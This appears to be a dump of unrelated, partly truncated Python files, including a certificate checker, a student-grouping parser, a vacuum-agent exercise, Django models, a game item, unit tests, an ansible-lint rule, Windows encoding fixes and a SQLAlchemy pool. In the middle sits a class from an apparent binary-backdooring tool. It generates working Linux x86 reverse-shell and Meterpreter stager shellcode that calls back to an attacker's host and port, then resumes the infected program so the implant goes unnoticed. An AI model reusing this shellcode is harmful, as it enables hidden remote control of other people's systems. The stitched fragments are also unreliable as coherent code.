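#     isValidUUID('{5be9954c-02e0-4a7a-a552-dfe5b4e7a1b3}')  # False: str(UUID) differs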
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
def checkCerts():
"""
Checks to see if required TLS certificates exist in Resources directory. Attempts to generate certificates if not found
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
    if not all(path.isfile(path.join(resDir, cert)) for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
            hasOpenSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
                    newDir = ofile
break
if not hasOpenSSL and files:
                # sort filenames to list newest version first
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
            if all(path.isfile(path.join(resDir, cert)) for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
        elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
            rule['name'] = split_key(line)[0].lower()
rule['attribute'] = split_key(line)[1]
# read extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
val = tuple([v.strip() for v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
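# Hedged example of the input format this parser accepts (inferred from the
# branches above, not taken from the GroupEng docs; the rule name and
# attribute are illustrative):
#
#     classlist: students.csv
#     group_size: 4
#     student_identifier: ID
#     - distribute: gpa
#       values: (3.5 = 4.0), 2.0
#
# A rule starts with '-'; its first token becomes rule['name'], and following
# 'key: v1, v2' lines are attached until the next '-' line. '=' groups values
# into union tuples via union_group(), so '(3.5 = 4.0)' becomes (3.5, 4.0).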
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environment
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
# TableDrivenVacuumAgent, ModelBasedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
        bump = ('Bump' if agent.bump else 'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
                dirt = dirt_list[0]
agent.performance += 100
                self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
    Linux ELF Intel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
        For use with position-independent shellcode supplied by the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
field=models.PositiveSmallIntegerField(default=0, verbose_name='position', editable=False),
),
    ]
from . import font
from .indicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIndicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystick import Joystick
from . import base_test
import src
import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy | everything on the current tile or the container.
Activate it to trigger a exlosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
            character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
event = src.events.RunCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
from django.db import models
class Salary(models.Model):
id = models.AutoField(primary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
    class Meta:
db_table = 'swan_salary'
def __str__(self):
        return str(self.id)
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
    def test_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
        output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
input = [{ 'name': ['first', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
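# A minimal sketch of a serialize() consistent with the tests above (the real
# serializer module is not shown here, so this is an illustration rather than
# the project's actual code): each dict contributes key=value lines joined by
# CRLF, and list values become tab-indented, brace-delimited blocks.
def _sketch_serialize(items, depth=0):
    indent = '\t' * depth
    lines = []
    for item in items:
        for key, value in item.items():
            if isinstance(value, list):
                if value and isinstance(value[0], dict):
                    # nested structure: recurse one level deeper
                    body = _sketch_serialize(value, depth + 1)
                else:
                    # plain multi-value list
                    body = '\r\n'.join('%s\t%s' % (indent, v) for v in value)
                lines.append('%s%s={\r\n%s\r\n%s}' % (indent, key, body, indent))
            else:
                lines.append('%s%s=%s' % (indent, key, value))
    return '\r\n'.join(lines)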
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."])) |
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
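# Illustration only (hypothetical task dicts, shaped the way ansible-lint
# hands them to matchtask): a git task with no explicit version matches the
# rule, while one pinned to a tag does not.
#
#   rule = GitHasVersionRule()
#   bad = {'action': {'__ansible_module__': 'git',
#                     'repo': 'https://example.com/repo.git'}}
#   good = dict(bad, action=dict(bad['action'], version='v1.2.3'))
#   assert rule.matchtask(None, bad) is True
#   assert rule.matchtask(None, good) is False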
or frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
By default python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://b | ugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sy | s.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace characters that cannot be printed instead of failing.
text = text.decode(self.encoding, 'replace')
self._stream.write(text)
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
def win_handle_is_a_console(handle):
"""Returns True if a Windows file handle is a handle to a console."""
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE
FILE_TYPE_CHAR = 0x0002
import sqlalchemy.pool
import time
import math
class SAAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there | will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
pool_size is passed to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
# Internal function to allow overriding, primarily for testing.
return time.time()
def _update_qsize(self, ts, checkout):
# A weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
self.rate += (1-math.exp(self.decay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
# Poisson distribution we can calculate how many connections we
# actually need to achieve this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Stephen Bunn (stephen@bunn.io)
# GNU GPLv3 <https://www.gnu.org/licenses/gpl-3.0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
class LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
